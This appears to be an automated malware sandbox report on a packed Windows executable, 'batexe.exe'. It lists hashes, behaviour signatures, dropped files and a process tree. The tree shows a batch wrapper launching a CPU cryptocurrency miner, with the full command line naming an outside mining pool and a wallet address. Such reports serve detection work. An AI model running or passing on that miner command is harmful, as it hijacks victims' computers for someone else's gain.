Analysis

  • max time kernel
    298s
  • max time network
    303s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    24/02/2024, 07:29

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Users\Admin\AppData\Local\Temp\7B89.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\7B89.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7B89.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4104
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8608.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3232

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7B89.tmp\b2e.exe

    Filesize

    3.4MB

    MD5

    552c90daf412dd270b30229f3ce179e2

    SHA1

    7377396f3d91f84f1d3b5b82520ad936ea37784e

    SHA256

    57caf3150bc5311f0e4d9fb8afd1f8a082336acc2dacb51b52e52309ad22529f

    SHA512

    396c41940912d484725261fe9d46ebf2de0168cb2d342104988dea0a31d30131724a42a5c931c3ce2fa2aa88c88c81e679802e3dd4d800db79821bd8e54e0cb0

  • C:\Users\Admin\AppData\Local\Temp\7B89.tmp\b2e.exe

    Filesize

    3.1MB

    MD5

    d3d1e619f50d778e6a1e24094fd1f467

    SHA1

    173779caf60cacbe7baced4e14bbc6d477d79c57

    SHA256

    9e4266ebaebc07e76a6fb804ab0623ed1d18d19bf23754aa106bdf75e09b4ebb

    SHA512

    2f59cffec0d0f586ee6e3030e48aa45749794a7a6017ab3e250cdc441efd83f5776050f4000d9881172cb000e77c00e081c75914c41445787fd68a4e8bc7b01c

  • C:\Users\Admin\AppData\Local\Temp\7B89.tmp\b2e.exe

    Filesize

    2.6MB

    MD5

    c513d8ac28d9f0e3f3440329c484eb99

    SHA1

    3af83e12f31b55b4942d1228bacab223cee5305e

    SHA256

    a65e48a0a11223496b15fc7d5c74e40d09b14ceaa359e05a929a30dfb463a5d9

    SHA512

    2f8007152f64ab5308a0e4f3cb1332720f1c7c753239840c2a52d5068980b32c2373d7a6f8ed2fd0ae40f70f65c6850b4a74c0c6b50a2be6694ecea7f72a00da

  • C:\Users\Admin\AppData\Local\Temp\8608.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.7MB

    MD5

    72e5f8cb5c7bf948b4f6c334b8600779

    SHA1

    b1b7d8781e99acccbfe159ffd60f41c48c0a7ce8

    SHA256

    c66f2e0cc16950b268b51714ae3ee54c2039ef1436ddc12c214370260c721ea9

    SHA512

    dc667080983c24314bef6b402e98b1b5bdb6b67bd2d8cce59fe9f7624bd20e388418139a4dce20d3b2ea6fdfc9030d4eb5b240eeffd3a9d80975c9191e471a76

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.6MB

    MD5

    e8cf45c91454f4e89224f2e30a26720f

    SHA1

    5b51fdef892ffe0d7602f8995df086fe65008d2d

    SHA256

    ec36cd780b22ef45c5ff0b481f0de4061e1380340ed2a2e810bb44cf5d3e3829

    SHA512

    4a839ead157b2f23445de616d5564f0b6f470162f8d279b085b8e59341ad4e4fdacd6806c93b04b172872e19491b7d582128824c5dc23ab97451463aa77c988f

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    7cf672bee2afba2dcd0c031ff985958e

    SHA1

    6b82a205db080ffdcb4a4470fce85a14413f3217

    SHA256

    c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

    SHA512

    3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1.5MB

    MD5

    16ce27d2a8567ced9fd2b9864bfa5904

    SHA1

    2544dfb28db72df1f43710a63e5f18c636dd2d67

    SHA256

    0c8425f07ad318e81d10f0cbaa55350d68d137ccd9ce11cada05fab29c0f8c9f

    SHA512

    e96e5cd2e3879273a4d3c9309771fe5203cb6d55d97ada5bb9ff47a3020c1362f6ba3a501f35c805796f48c7b7ef9820f601cbbfabf1d971d955db6204468e7a

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1.8MB

    MD5

    7ca7afc81c1be5c8d1f56b16793da43f

    SHA1

    87d6066292f6569252811b805d3c3539e1497d3d

    SHA256

    79ca65b0eacb885c2f59efad366585f199ecdc0cfb0e22a6c37086aefe47df66

    SHA512

    8f036b264437460b30683f91cab02849ba538b25311ab499392feb3e56eae9d964f90f775849f4f495f8b69aaecce45f640cad092bd30d5902437fc5a5e7a8e5

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1.9MB

    MD5

    f213a61ee59c62ea555d105197aa459c

    SHA1

    8df9c03158996f92028435e35bfa8a3e4f3bc950

    SHA256

    f1ec565c3e233d2fcb9960a31d0d5fc70c9c2b6e1045d2b028290b481941174a

    SHA512

    8fcc3535b3a8c7bf273fc4d1713baed6dc8eff7481af4b3ce239f553224133614671e486e576ef1057ea73cbf90d1a0c17f9fb7a39fa401bf3ffbbd682ae5b9b

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/1984-8-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/3232-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-64-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-46-0x000000006D6C0000-0x000000006D758000-memory.dmp

    Filesize

    608KB

  • memory/3232-45-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3232-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3232-47-0x00000000010F0000-0x00000000029A5000-memory.dmp

    Filesize

    24.7MB

  • memory/3232-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-74-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-84-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3232-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4104-7-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4104-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB